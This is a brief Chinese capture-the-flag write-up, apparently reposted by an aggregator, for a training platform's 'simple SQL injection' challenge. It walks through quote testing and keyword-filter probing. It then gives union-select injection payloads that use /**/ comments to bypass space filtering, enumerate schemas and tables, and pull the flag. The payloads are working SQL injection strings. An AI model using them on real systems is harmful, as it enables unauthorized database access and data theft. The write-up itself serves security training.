实验吧 简单的SQL注入1

Posted S1lenc3

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了实验吧 简单的SQL注入1相关的知识,希望对你有一定的参考价值。

解题链接: http://ctf5.shiyanbar.com/423/web/

解题思路:一,   输入1,不报错;输入1‘,报错;输入1‘‘,不报错。

二 ,   输入1 and 1=1,返回1 1=1,可知,and被过滤了。

三,    输入1 union select,返回1 select,猜测关键词被过滤。

四,    用/**/代替空格,爆库:1‘/**/union/**/select/**/schema_name/**/from/**/information_schema.schemata/**/where/**/‘1‘=‘1。

五,  爆表:1‘/**/union/**/select/**/table_name/**/from/**/information_schema.tables/**/where/**/‘1‘=‘1。

六,  最后一步:1‘/**/union/**/select/**/flag/**/from/**/flag/**/where/**/‘1‘=‘1。

以上是关于实验吧 简单的SQL注入1的主要内容,如果未能解决你的问题,请参考以下文章

简单的sql注入之2——实验吧

实验吧 简单的SQL注入1

实验吧-web 简单的sql注入(合集,答案是一样的--_--)

零号培训平台课程-1SQL注入基础

零号培训平台课程-1SQL注入基础

零号培训平台课程-1SQL注入基础